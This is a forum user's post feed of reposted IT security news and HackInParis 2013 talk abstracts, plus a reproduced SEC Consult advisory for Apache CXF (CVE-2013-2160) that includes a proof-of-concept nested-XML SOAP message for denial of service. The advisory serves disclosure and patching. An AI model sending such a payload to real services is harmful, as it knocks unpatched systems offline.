Jump to content

Matt

Active Members
 View Profile  See their activity

  • Posts

    1773

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by Matt

  1. Matt
    Microsoft sustine ca hackerii au atacat o serie de computere prin exploatarea unei vulnerabilitati in Internet Explorer 8, dezvaluita in luna mai de catre un cercetator Google. Inginerul de securitate Google, Tavis Ormandy, a publicat informatii cu privire la vulnerabilitate, fara a atentiona, in prealabil, Microsoft, insa compania a emis un patch pentru a remedia problema in actualizarea de securitate Patch Tuesday din luna iunie. Microsoft a oferit putine detalii cu privire la atacuri, insa a declarat ca hackerii au exploatat defectiunea pentru a derula atacuri targeted, releva The Guardian. Tavis Ormandy a avut cateva probleme in acest sens cu Microsoft, care incurajeaza cercetatorii sa dezvaluie defectiunile in mod responsabil, astfel incat atacatorii sa nu exploateze vulnerabilitatile inainte ca acestea sa fie remediate. In luna iunie 2010, Ormandy a anuntat o vulnerabilitate zero-day in Windows XP si Windows Server 2003 si a publicat un consultativ care includea codul de exploatare, la doar cinci zile de la raportarea vulnerabilitatii catre Microsoft. Cu toate acestea, faptul ca vulnerabilitatea este exploatata dupa lansarea unei actualizari de securitate, evidentiaza importanta mentinerii tuturor programelor software actualizate. Esecul in ceea ce priveste remedierea aplicatiilor software expune sistemele computer atacurilor care exploateaza vulnerabilitatile cunoscute, arata cercetarile. Mentinerea software-ului actualizat poate furniza 80% protectie impotriva atacurilor cibernetice, a explicat analistul de cercetare Secunia, Stefen Frie, audientei Infosec Europe 2012 din Londra. Sursa: ComputerWeekly.com | Information Technology (IT) News, UK IT Jobs, Industry News
  2. Matt
    Eu nu cunosc nicio Teava.
  3. Matt
    Foarte frumos
  4. Matt
    Description : Apache CXF versions prior to 2.5.10, 2.6.7, and 2.7.4 suffer from a denial of service vulnerability. Author : A. Falkenberg, Joerg Schwenk, Juraj Somorovsky, Christian Mainka Source : Apache CXF 2.5.10 / 2.6.7 / 2.7.4 Denial Of Service ? Packet Storm Code : SEC Consult Vulnerability Lab Security Advisory < 20130709-0 > ======================================================================= title: Denial of service vulnerability product: Apache CXF vulnerable version: Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 fixed version: Apache CXF 2.5.10, 2.6.7 and 2.7.4 onwards CVE number: CVE-2013-2160 impact: Critical homepage: http://cxf.apache.org/ found: 2013-02-01 by: Andreas Falkenberg, SEC Consult Vulnerability Lab Christian Mainka, Ruhr-University Bochum Juraj Somorovsky, Ruhr-University Bochum Joerg Schwenk, Ruhr-University Bochum https://www.sec-consult.com ======================================================================= Vendor/product description: ------------------------------------------------------------------------------ "Apache CXF is an open source services framework. CXF helps you build and develop services using frontend programming APIs, like JAX-WS and JAX-RS. These services can speak a variety of protocols such as SOAP, XML/HTTP, RESTful HTTP, or CORBA and work over a variety of transports such as HTTP, JMS or JBI." URL: http://cxf.apache.org/ Business recommendation: ------------------------------------------------------------------------------ Various denial of service attack vectors were found within Apache CXF. The recommendation of SEC Consult is to immediately perform an update. Vulnerability overview/description: ------------------------------------------------------------------------------ It is possible to execute Denial of Service attacks on Apache CXF, exploiting the fact that the streaming XML parser does not put limits on things like the number of elements, number of attributes, the nested structure of the document received, etc. The effects of these attacks can vary from causing high CPU usage, to causing the JVM to run out of memory. URL: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc Proof of concept: ------------------------------------------------------------------------------ The following SOAP message will trigger a denial of service: <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Body> <element> <element> <element> <element> [thousands more] </element> </element> </element> </element> </soap:Body> </soap:Envelope> There are various other XML payloads that will also trigger a denial of service on vulnerable services. Vulnerable / tested versions: ------------------------------------------------------------------------------ This vulnerability affects all versions of Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4. Vendor contact timeline: ------------------------------------------------------------------------------ 2013-02-22: Advisory sent to vendor by Juraj Somorovsky (RUB) 2013-02-22: Advisory acknowledged by vendor 2013-04-19: Vendor confirms vulnerability 2013-05-15: Vendor publishes fixed version 2013-06-27: Vulnerability is disclosed by vendor 2013-07-09: SEC Consult releases security advisory Solution: ------------------------------------------------------------------------------ CXF 2.5.x users should upgrade to 2.5.10 or later as soon as possible. CXF 2.6.x users should upgrade to 2.6.7 or later as soon as possible. CXF 2.7.x users should upgrade to 2.7.4 or later as soon as possible. Also see the advisory of the vendor: http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc Workaround: ------------------------------------------------------------------------------ No workaround available. Advisory URL: ------------------------------------------------------------------------------ https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Andreas Falkenberg / @2013
  5. Matt
    Hackers are exploiting a bug in Microsoft Windows that was originally disclosed by a Google researcher two months ago. Microsoft issued the warning in its latest security advisory, saying that without the patch fix hackers could theoretically use the flaw to increase their privileges, thus wrestling control of the device from the end user. The flaw was originally discovered and posted publicly online by Google security engineer Tavis Ormandy on the full disclosure blog in May. Ormandy said the bug relates to a "silly" piece of code from Microsoft, used in Windows 7 and Windows 8. It was unclear whether the flaw had been actively exploited by criminals prior to Ormandy's post, though Microsoft's has since confirmed detecting numerous targeted attacks aimed at it. The details of the attacks and the potential damage caused remain unknown and at the time of publishing Microsoft had not responded to V3's request for comment. The post has since caused a heated debate about the nature of full disclosure within the security community. Experts that practice a full disclosure policy believe posting any security flaws they discover online to the public helps improve the world's security, forcing the parties involved to fix the flaws sooner rather than later. Others believe the practice is irresponsible as it alerts cyber criminals and black hats about the flaw before the company has had time to react. Ormandy is one of many Google engineers to support the full disclosure philosophy. Prior to his release Google security engineers Chris Evans and Drew Hintz threw down a gauntlet to companies saying they will give them just seven days to come clean on any zero day vulnerabilities they discover before making them public. Sursa V3.co.uk
  6. Matt
    The Ministry of Defence (MoD) was the victim of a cyber espionage attack that led to the theft of key data, in the latest evidence of the sustained cyber threats facing the UK. The revelation comes from a report by the Intelligence and Security Committee (ISC) in its annual report to parliament, in which it revealed that the MoD confirmed the loss in the section on the cyber threats facing the UK. The report said: “Government departments are also targeted via attacks on industry suppliers, which may hold government information on their own systems. We have been told that cyber espionage ‘[has] resulted in MOD data being stolen'." V3 contacted the MoD for more information on the attack but had received no information at the time of publication. Not only this, but the ISC also reported that numerous government departments were hit by a attack in the summer of 2012 with 200 email accounts within 30 departments targeted. “In recent years, many government departments have come under cyber attack: often, this has involved websites being disrupted by denial-of-service attacks, and last summer over 200 email accounts across 30 government departments were targeted in an attempt to steal confidential information,” it said. The ISC said the government systems to protect against such attacks are “reasonably well developed” but there are still concerns over whether updates to key security tools and software are applied quickly enough to protect networks. Overall the ISC said such attacks underline the scale of the threat facing the UK and the need for the government to do all it can to protect against cybercrime. “The threat the UK is facing from cyber attacks is disturbing in its scale and complexity. The theft of intellectual property, personal details and classified information causes significant harm, both financial and non-financial,” it said. “It is incumbent on everyone – individuals, companies and the Government – to take responsibility for their own cyber security. We support the Government’s efforts to raise awareness and, more importantly, our nation’s defences.” As such it said that, while spending cuts in the defence budget were accepted, cyber security must remain a key priority for future resources. “Planning must begin now to ensure that resources will be made available to combat cyber attacks in the latter half of this decade, bearing in mind the resources our allies are putting into this area in recognition of the seriousness of the threat," it said. "The government must ensure that real progress is made as part of the wider National Cyber Security Strategy: the UK cannot afford not to keep pace with the cyber threat." Sursa V3.co.uk
  7. Matt
  8. Matt
    1.THE INNER HTML APOCALYPSE : HOW MXSS ATTACKS CHANGE EVERYTHING WE BELIEVED TO KNOW SO FAR Description This talk introduces and discusses a novel, mostly unpublished technique to attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its often unknown capabilities - every single one of them. We analyzed the type and number of websites that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to be understood and researched even further.The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability. 2.REMOTING ANDROID APPLICATIONS FOR FUN AND PROFIT Description Fino is a brand new tool we designed to perform dynamic android applications analysis in a pythonic and scriptable way. We ended up with a very powerful tool, allowing any reverse-engineer to remotely control any android application, from its main component (user interface) to every internal and obscure class. This talk focuses on how Fino may makes the Android reverse-engineer's life easier and to use it to perform effective and powerful assessments on Android applications. Summary of research: We recently presented and released a tool called Fino during the 29C3 event last December, which allows to dynamically and remotely interact with android applications by injecting a small piece of code into them. We focused our presentation on how we designed this tool and quickly showed some cool features is provides us with. Fino is a brand new (and young) tool providing many ways to remotely interact with a target application installed on a smartphone or even in an emulator, and also a dedicated Python API. Android applications may be scripted, internal components remotely instanciated and used in a pythonic way and much more. With Fino, no need to understand how a protocol was designed and used by the application (and the remote server), just reuse the core components implemented in the application itself to get a working client in order to fuzz the server. With Fino, even text string obfuscation is useless since the methods retrieving the clear text strings may be called directly. Fino is a great and powerful tool to perform dynamic analysis of android applications from a connected computer and to automate the whole process. This talk will not focus on the tool itself (even if Fino will be shortly presented) but more on the practical aspects of this tool from a reverse-engineer's point of view. That is, we will demonstrate this tool may be used when performing Android application assessments, how this tool may help the reverse-engineer to solve some of the recurrent problems he encounters during his assessments and eventually how to improve the tool itself to fit his needs. 3.THE CONTROL OF TECHNOLOGY BY NATION STATE : PAST, PRESENT AND FUTURE - THE CASE OF CRYPTOLOGY AND INFORMATION SECURITY Description Since the end of WWII, strong controls have been enforced to prevent the spread of military-grade technology or dual use technologies and, since the end of the seventies, especially of Information Security science. The rises of the Internet phenomenon as well as the rise of terrorism make this control even stronger yet more subtle. Contrary to widely belief, the freedom of technology and science is just an illusion. Recently the emerging hacker phenomenon has upset and thwarted this balance between the need of freedom and the need of State security requirements. The main issue lies in the fact that these controls originally focus on homeland and international security purposes (e.g. protection against terrorism or mafia activities). But the fall of the iron curtain and of the Soviet block has dramatically changed the rules of the game. The enforced controls aim at first organizing an economic dominance of a very few Nation States (e.g. G-8 countries) whose real intent is to organize the strategic dominance over the ever-growing technological societies. As an example (among many others), we could mention the case of Cisco vs Huawei/ZTE companies. Based on his own military experience and on his research work, the author is going to explain how this control has been and is organized and will explain the role of the four major actors: Nation State, Industry, Academics and Hackers. Without loss of generality, we will take the domain of cryptography and of network equipment as illustrating cases. 4.WINDOWS PHONE 8 APPLICATION SECURITY Description Microsoft is expanding its presence on smartphone OS market. With Windows Phone 8 release we got brand new mobile operating system. Users got new devices and a lot of cool features (like NFC), so developers too. Windows Phone 8 platform allows to create applications with rich functionality, and for some of them security issue is very important. In this presentation we want to summarize Windows Phone 8 security model and talk about applications security. This is important both for developers and security auditors. Also we will demo a tool that allows you to analyze Windows Phone applications. We will also show on real examples how to find vulnerabilities with this tool. Windows Phone 8 is a new mobile platform and there is not so much information about security issues out there. This presentation will cover Windows Phone 8 security model. We will especially cover applications security. During our research we examined number of Windows Phone applications and learned where developers have to be careful when developing applications and where auditors may find vulnerabilities. Application analysis requires number of tools, from generic tools like disassembler to more specific tools like .NET decompiler. There are few tools targeting Windows Phone 7 platform and applications, offering some features like decompiling, logging method calls and deploying app to Windows Phone emulator. But all of these features are basic and does not offer a lot, and none of these tools support Windows Phone 8 applications. During our work we created a tool that makes application analysis easier. It supports both Windows Phone 7 and 8 applications and offers significant number of features that helps to understand application’s logic and find vulnerabilities. Auditors can use both static and dynamic analysis to achieve this. This is logical continuation of our talk “Inspection of Windows Phone applications” at BlackHat. This presentation will be focused on Windows Phone 8 and applications security. 5.ANALYSIS OF A WINDOWS KERNEL VULNERABILITY : FROM ESPIONAGE TO CRIMINAL USE Description A series of targeted attacks, now known as "Duqu", was discovered in 2011. The initial vector for these attacks was a Windows TrueType Font 0-day vulnerability [CVE-2011-3402]. A year later, this exploit begins to appear in Russian exploit kits. These exploit kits use the *exact* same exploit code as "Duqu". (Right down to the metadata.) This presentation explains the technical details of this exploit. It is not about "Duqu" nor Russian exploit kits. The vulnerability itself only allows the attacker to perform an "OR" operation on a value of their choice, at a memory location of their choice. This exploit leverages the functionality of the TrueType Font Finite State Machine itself to manipulate memory to provide for a reliable execution of the shellcode. > Reason why this material is innovative or significant or an important tutorial. It's an advanced kernel exploit, used in a real world targeted attack against a certain unnamed commercial or government entity. And now that very same kernel exploit is being used by criminals. The exploit technique is unique as well. I believe that it is the only exploit which uses the TrueType graphics operators to manipulate kernel memory into reliable, multi-platform, shellcode execution. (It even does sanity checks on itself to avoid a blue-screen of death.) The current draft of the presentation is already over 200 slides, but most of those are code walkthrouh animations. I still need to add information about the similarities and differences between the original Duqu sample, and the current exploit kit. And details about the kernel shellcode. There are a bunch of slides about how to reverse engineer a kernel exploit, which I'll probably cut out for time. (And safe to assume audience already knows how?) 6.THE SECURITY OF MDM (MOBILE DEVICE MANAGEMENT) SYSTEMS Description More and more corporates are deploying mobile devices like smartphones and pads. To manage these devices, several solutions are available like MobileIron, Good Technology, Symantec and several others. I have installed and studied two of these solutions from a security point of view. More precisely, my goal was to determine if it is possible for the administrator of these solutions to steal data, to read mails of employees (and employers), etc. The result were very surprising as I discover serious security defects in those products. During this presentation, I will share my experience with the audience, how I have setup the lab environment, the kind of tests I have made, how I discover the vulnerabilities and which ones. 7.DBI FRAMEWORKS APPLIED TO COMPUTER SECURITY Description The main goal of this talk is to show how Dynamic Binary Instrumentation (DBI) works, and what for it can be applied in Computer Security. As proof of concepts, it will be shown how DBI can be useful for detecting vulnerabilities (e.g., buffer overflow or taint analysis) in Windows executables. A DBI framework allows you to easily program a tool using DBI concepts. There are very different DBI frameworks on the market, each one has its advantages and disadvantages. In this talk, moreover, a performance analysis is shown comparing some DBI frameworks (namely, Pin, Valgrind and DynamoRIO). The main goal of this comparison is to be able to choose the best suitable DBI framework for each user, depending on his/her needs. * Summary of the research: The main idea is to give a general overview of DBI, how it works, and its applicability to Computer Security domain. Different known vulnerable source code are going to be shown, and several tools using DBI are also shown proving how these vulnerabilities can be caught and reported. Finally, and as different DBI frameworks are available in the market, a performance analysis between the most-known DBI frameworks is shown. This work is the result of a collaboration with my PhD. advisor, José Merseguer, and a former student of mine, who made his Final Project Degree on this topic, entitled 'Estudio comparativo de frameworks de Instrumentación Dinámica de Ejecutables' (in Spanish, sorry for that!) and that it can be viewed here: Estudio comparativo de frameworks de instrumentación dinámica de ejecutables | Trabajos academicos - Repositorio Digital de la Universidad de Zaragoza http://webdiis.unizar.es/~ricardo/files/PFC.Estudio.Frameworks.DBI/Memoria_PFC_EstudioDBI.pdf The content of this talk has been recently presented on NoConName 2012, a Spanish security conference (more precisely, on 3rd November 2012). 8.BYOD : THE PRIVACY AND COMPILANCE RISKS FROM BRINGING YOUR OWN MOBILE DEVICE TO WORK Description BYOD is a Disaster. It is a privacy fiasco. It will cause massive data breaches and privacy violations. PLUS -n BYOD is more expensive than running two separate devices. This will be a highly charged debate on to BYOD or not… and is is worth the risk?BYOD is a Disaster. It is a privacy fiasco. It will cause massive data breaches and privacy violations. PLUS -n BYOD is more expensive than running two separate devices. This will be a highly charged debate on to BYOD or not… and is is worth the risk? 9.ORIGIN POLICY ENFORCEMENT IN MODERN BROWSERS Description The Same Origin Policy is the foremost security policy in all browsers. Like most browser code, it underwent a significant amount of changes to keep up with the recent development for HTML5. This talk covers the Same Origin Policy implemented in modern browsers. It goes into detail where browsers behave similarly and where differences occur. The presentation of noteworthy exceptions, regardless of whether they are intended or have evolved out of legacy features, is then followed by an analysis of previous flaws. We identify parsing mismatches as the key source of policy bypasses and suggest methods to analyze and test browser code with regard to this discovery. The talk also gives an outlook into things that may come and evaluates the origin as a measure to bind authority for HTML5 APIs. Using our methods we have also identified security issues in the Java Runtime Environment and Mozilla Firefox, which will be presented in the end. 10.THE REALEX PAYMENTS APPLICATION SECURITY STORY, NARRATED BY SECURITY NINJA Description As the old British Telecom adverts used to say it's good to talk so I thought now was a good time to talk about how we do application security at Realex Payments. Rather than just talk about where we are today this talk will focus on the lessons learned over the past five years and what I'd do differently if I could it all again. I will tell the story of how application security has worked and evolved in a fast growing technology company from the day we created our first application security role in the business to our current application security approach. The story will include how we scaled application security to keep up with the changes in a fast growing business, how playing card games with developers was one of the best things we've ever done and how following the KISS principle in the early days of an application security program is vital. You will see how we have progressed from having no dedicated application security resources to our current staffing levels and how our goals have evolved from simply security reviewing our applications to more grand goals such as wanting to provide free application security training for anyone in Ireland. This isn't an application security talk focusing on the theory and approaches that seem good on paper. You will have the opportunity to learn the lessons from five years of real world application security from the person who was at the centre of application security in Realex Payments. Following on from the success of Agnitio I will be releasing three new open source application security tools I have developed in this talk. These tools have helped improve application security reviews, reporting and visibility in Realex and I hope they will do the same for you! The Ninja News Daily said "5 stars! The Realex Payments Application Security story is a gripping story of one ninjas journey through five years of application security. Do not miss!" 11.MALWARE VS VIRTUALIZATION Description Virtualization tools plays cat and mouse. Malware are studied into virtual environments, thus modifying their behavior to mimic inoensive programs and avoid detection. They discover more accurately their execution environment. Detection tools are stealthier, and tries to be as close as possible to real hardware behavior. A technological breakthrough happened when malware became the hypervisors, and lever-aged seamless virtualization. This paper analyzes the actual state of this race. Detection techniques and counter measures are detailled. Virtualization leverages security tools isolation and stealth. Malwares are able to virtualize the whole operating system on-they, and control all interactions with hardware without any hook. On the other side, it is a powerfull tool to analyze processes behaviors seamlessly. The virtualization detection race is far from ended. Malware research shows that some tries to detect while other tries to be as seamless as possible. http://www.youtube.com/watch?feature=player_embedded&v=L-c22iQUG7k 12.ARE WE GETTING BETTER? - HACKING TODAYS TECHNOLOGY Description Are we getting better as an industry? We have NextGen firewalls, APT prevention, DLP, and technology that can solve our technological needs from hackers. Why do we continue to see an increase in data breaches if the technology is working. Let's take a look at todays technology and hack it. This talk will cover some advanced techniques used to infiltrate a number of organizations during real world penetration tests. The talk will also discuss why these technologies fail us and why the reliance has to be on a proactive security strategy versus trying to patch it with a band aid. Lets find out if we are getting better or if its the same old struggle. Hackers are here to stay, are we going to be able to withstand an attack? http://www.youtube.com/watch?feature=player_embedded&v=lZmh8LuVDH4 13.NEXT GENERATION ROOTKITS DOR ARM BASED DEVICES Description Security of mobile operating systems is one of the most researched topics of today - iOS & co use mandatory code signing, ASLR and NX/DEP to make sure that no malicious code can be executed. While most attacks target the operating system itself, this talk will take a look at a new approach for mobile rootkits, using operating system independent hardware features of the CPU itself which make it almost impossible to be detected from the operating system. http://www.youtube.com/watch?feature=player_embedded&v=8dYzv7_hKyE 14.I'M IN YOUR BROWSER, POWNING YOUR STUFF - ATTACKING GOOGLE CHROME EXTENSIONS Description Browser extensions can let you easily make notes, entertain you with a game, or take an annotated screenshot of the website you're visiting. They can also XSS any website you're visiting, harvest your browsing history, replace your cookies, silently change your proxy or execute code on your machine. Even benign, legitimate extesions can do this, just because they were poorly coded. These flaws are fairly common, and the attacks are easy. In this talk meterpreter sessions will be opened, Google will be XSSed, all your mailbox will belong to us and your PGP private keys will be extracted. But as constructing attack payloads is so boring, we'll present tools that help you find vulnerable extensions, confirm the vulnerabilities and exploit them. After the talk you'll be set to go to either attack Chrome extensions or code them properly as multiple code examples will be given. Research summary: The presentation will consist of technical overview of Google Chrome extensions architecture, its built-in security mechanisms, inluding Content Security Policy to prevent XSS attacks. Focus will be given into bypassing the protections by leveraging poor extension coding, UI redressing attacks or side-channel attacks. I've developed a Chrome Extension Exploitation Framework - XSS CheF (https://github.com/koto/xsschef ) that gives a pentester the possibility to leverage flaws in extensions to conduct further attacks (tool is similar to BeEF in that respect). Several flaws in popular Chrome extensions will be demonstrated, with varying consequences from universal XSS flaw to Remote Code Execution on clients machine. Some of the research has been introduced on Black Hat USA 2012 workshops I've given with Kyle Osborn ( http://media.blackhat.com/bh-us-12/Briefings/Osborn/BH_US_12_Osborn_Koto... ), multiple other real-world examples have been added though plus the research now focuses on exploiting extensions with v2 manifest, that are obligatory protected by Content Security Policy. http://www.youtube.com/watch?feature=player_embedded&v=ATJqa3Vvl_0 Sursa HackinParis2013 // Noaptea asta sigur nu dorm. Enjoy.
      • 1
      • Upvote
  9. Matt
    Failed.
  10. Matt
    Uite-l pe asta.
  11. Matt
    Description : A series of targeted attacks, now known as "Duqu", was discovered in 2011. The initial vector for these attacks was a Windows TrueType Font 0-day vulnerability [CVE-2011-3402]. A year later, this exploit begins to appear in Russian exploit kits. These exploit kits use the *exact* same exploit code as "Duqu". (Right down to the metadata.) This presentation explains the technical details of this exploit. It is not about "Duqu" nor Russian exploit kits. The vulnerability itself only allows the attacker to perform an "OR" operation on a value of their choice, at a memory location of their choice. This exploit leverages the functionality of the TrueType Font Finite State Machine itself to manipulate memory to provide for a reliable execution of the shellcode. > Reason why this material is innovative or significant or an important tutorial. It's an advanced kernel exploit, used in a real world targeted attack against a certain unnamed commercial or government entity. And now that very same kernel exploit is being used by criminals. The exploit technique is unique as well. I believe that it is the only exploit which uses the TrueType graphics operators to manipulate kernel memory into reliable, multi-platform, shellcode execution. (It even does sanity checks on itself to avoid a blue-screen of death.) The current draft of the presentation is already over 200 slides, but most of those are code walkthrouh animations. I still need to add information about the similarities and differences between the original Duqu sample, and the current exploit kit. And details about the kernel shellcode. There are a bunch of slides about how to reverse engineer a kernel exploit, which I'll probably cut out for time. (And safe to assume audience already knows how?) For More Information please visit : - https://www.hackinparis.com
  12. Matt
    A report (PDF) released by the US Department of Commerce has revealed how one US agency, fuelled by the paranoia of a nation-state attack, spent US$2.7 million trying to destroy US$3 million worth of its own IT equipment, even though evidence of such an attack was never found. At the end of 2011, the United States Computer Emergency Readiness Team (US-CERT) advised the Department of Commerce's Computer Incident Response Team (DOC CIRT) that its systems may contain a malware infection. DOC CIRT shortly after narrowed this infection down to a network shared by the National Oceanic and Atmospheric Administration (NOAA), the US Economic Development Administration (EDA), and other US departments and agencies. While NOAA's response team had cleaned the infection by January 12, 2012, the warning instead placed EDA on high alert. To determine the extent of the perceived infection, EDA asked DOC CIRT to provide a listing of what IT components may have been potentially infected. This began a line of miscommunication into the severity of the infection, with DOC CIRT providing a list of 146 IT components that were simply within the network boundary. In fact, only two components were found to be infected. Although EDA was not equipped to handle the issue alone, DOC CIRT asked EDA to resolve the issue. EDA, believing that DOC CIRT had identified 146 cases of infection, fired back that it was unable to do so. From EDA's response, DOC CIRT believed that EDA had done the analysis to identify that all 146 components were infected, and thus both parties had then convinced each other of a widespread infection that actually did not exist. Its reaction to the perceived threat grew more extreme. By January 24, 2012, it had enlisted the help of US-CERT and the Department of Energy (DOE), and cut its email, website services, and access to its database applications off from the network. It instead requested the US Census Bureau to provide internet access and email services. Further paranoia about the possibility of the attack being conducted by nation-state actors resulted in EDA bringing on an external information security contractor to examine its systems in addition to the existing resources examining the issue. This contractor initially reported to EDA that it had found "indications of extremely persistent malware and suspicious activity", giving weight to the belief that a sophisticated attack was underway. However, US-CERT's report indicated at the time that although common malware was present, there was no evidence of any nation-state activity or the extremely persistent malware as first thought. Shortly after these reports were filed, EDA requested the help of the US National Security Agency (NSA), and a day later, DOE also filed its report, noting the same results as US-CERT — that there was no nation-state attack. A little less than two weeks after its initial report, the contractor reversed its position, admitting that its initial analysis had been wrong, and there was no evidence of a highly sophisticated attack. The situation was further confused by the Department of Homeland Security (DHS), however, which issued a report based on the inaccurate information provided by DOC CIRT that began the entire chain of miscommunication. The NSA later used DHS' report as fact, and did not attempt to verify whether the information was sound, despite finding no nation-state activity or persistent malware in its own analysis. Ultimately, only six components within EDA's IT infrastructure were found to be infected, and only by common malware. Given that its systems had been looked at by several government agencies and an external contractor, EDA believed that little was to be gained from further forensic analysis, and on May 15, 2012, decided to turn its focus onto cleaning its data. Still paranoid about the possibility of a nation-state attack despite the findings of several reports, EDA's CIO ordered the destruction of all of EDA's IT components. These components included desktops, printers, TVs, cameras, computer mice, and keyboards. Even laptops that had been purchased prior to the incident and had not ever been put into operation were included. By August 1, 2012, EDA had destroyed over US$170,000 worth of its infrastructure. It had only been prevented from destroying the remaining US$3 million worth as it had run out of funding for the operation, and the Commerce IT Review Board refused to approve the US$26 million it would need to continue its recovery operations. By that stage, however, EDA had spent US$823,000 on its external security contractor, US$1.061 million on temporary infrastructure, US$175,000 to destroy its equipment, and US$688,000 on external assistance for its recovery operations. In all, EDA spent US$2.7 million to combat an infection that had never existed. Sursa Zdnet.Com My opinion : ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  13. Matt
    Keeping track of personal accounts and screen-names on the Internet is difficult. Did I use this handle from when I was in university or did I use the one that I adopted in my mid-20s? Wait, for this forum, was it the nickname I used when talking about techie topics or was it my fierce gamertag I want to intimidate folks with in multiplayer matches? Did this website utilize Facebook, Twitter, or Foursquare login, or did I register with my personal e-mail address and password? Aargh! When it comes to business accounts and identities, the ramifications of picking the right place of contact become much more important. Which online business identity do you want to prioritize, and how do you want people to talk about, label, and monitor your business? These days, it seems like businesses are encouraged to connect with their customers on as many platforms as possible. Not only do you need a website, you also need to be "in the conversation" via Twitter, broadcasting updates on Facebook, journaling your stories with a blog, sharing glamorized pictures over Instagram, pinning associated content on Pinterest, displaying your physical spot on Foursquare, and bonus points too if you're on Tumblr or Vine. But what do you want your customers to remember? The address to your Facebook page? The @name for Twitter, screen-name for Instagram, or your website's URL? Your business card will look like the world's busiest webpage if you stick all these links on it. So what's the one thing to highlight? Hashtag. I feel like small businesses need to be proactive and monitor what people are saying about them. Engage them rather than wait for them to figure out how to message you. If they're posting things on Facebook, Twitter, or Instagram and putting the appropriate hashtag, you should be able to find their content and respond accordingly. Proactive support and engagement can lead to increased sales and satisfaction. What's the key to figuring out what people are saying about you? Creating a natural hashtag and getting people to use it. Once content is posted with a hashtag, it should be easy for you to keep track of what's being said across all platforms. With my restaurants, I use the hashtags #standingsushibar and #tanukiraw. I put that on placemats and on business cards, and encourage folks to include those hashtags on their postings. So instead of needing people to remember the different IDs I have for different platforms, utilizing the hashtag would work across all. One hashtag to rule them all! Sursa Zdnet.com
  14. Matt
    Oracle has signed a deal with Cern to to provide additional IT management tools for the research organisation's database and infrastructure systems. The company said that Cern would be using its Enterprise Manager 12c platform to manage its databases, application servers and web servers. In total, the platform will account for the management of some 3000 objects. Oracle said that the Enterprise Manager platform would be overseeing Cern research and infrastructure systems including data generated by the famous Large Hadron Collider facility. The deployment includes some 200 Oracle Database instances and another 200 WebLogic server instances as well as application servers. “As many of our databases are critical for the operation of the accelerators and experiments, reliability is essential,” said Tony Cass, Cern database services group leader. “Optimizing our Oracle infrastructure is also important since we have to support increasing amounts of data within fixed budgets.” Cern, which generates massive amounts of data with its research projects, has arisen in the enterprise IT space as a major consumer of both hardware and services. The company has shelled out contracts to firms to build and maintain its vast datacentres and computing facilities. For Oracle, the announcement marks yet another major deal for the company. Last month, the firm announced contracts to provide services for Microsoft and Salesforce.com, providing its database platform for use the companies' respective cloud service offerings. Along with boosting the company's bottom line, the deals helped Oracle to set aside a pair of public feuds which had plagued the company. Sursa V3.co.uk
  15. Matt
    Este o stire oficiala . Mi se pare normal si logic sa nu postez seriale / crack-uri. Vrea cineva serial / crack sa caute pe google.
  16. Matt
    Sau 2-3 ani.
  17. Matt
    Amice , stirea asta este de acum 3 ani 2 luni.
  18. Matt
    The Scottish government has announced funding of £264m for the rollout of superfast broadband across the entire country, to ensure that 95 percent of homes and businesses can access high speed services by 2017. The project involves funding from BT to the tune of £106.7m as well as £50m from the Broadband Delivery UK (BDUK) project and £50.7m from local authorities. The Scottish government is putting up funding of £36.4m while the final £20.5m is from a European grant. This follows on from a £146m partnership announced earlier this year to bring superfast services to the remote Highlands and Islands area of Scotland. Deputy first minister for Scotland, Nicola Sturgeon, said the funding was a huge boost for the nation and would enable it to compete on a global stage. “Today's announcement signals the start of one of the most ambitious infrastructure projects in the whole of Europe. It will connect communities across rural and urban areas, providing a platform for future economic development and regeneration,” she said. "Next generation broadband enables businesses to compete on the international stage. It has the potential to transform the way in which we educate our children, provide health and social care and deliver our public services. It provides Scotland with a platform upon which we can build and sustain a world-class digital country.” Communications minister Ed Vaizey welcomed the news, claiming it is vital that the whole of the UK is able to benefit from superfast services. “The complex and remote landscape of much of Scotland makes this one of the largest and most challenging projects in the nationwide rollout of superfast broadband,” he said. “This contract, signed today, marks the beginning of a transformation of broadband services for the population of southern and mid Scotland. Together with the already agreed Highlands and Islands project, it will be instrumental in driving growth and boosting local economies throughout the country.” The investment comes amid criticism of the public funding setup for broadband in the UK, after the National Audit Office slammed the government for its handling of the rollout of broadband services, as the project is set to deliver its goals late and without sufficient competition to guarantee value for money. Scotland is hoping to market itself as a leading digital hub in the future, with the nation also touting its cool year-round climate as an ideal location for data centres by offering natural cooling, akin to nations such as Sweden that are now being favoured by web giants such as Facebook. Sursa V3.co.uk
  19. Matt
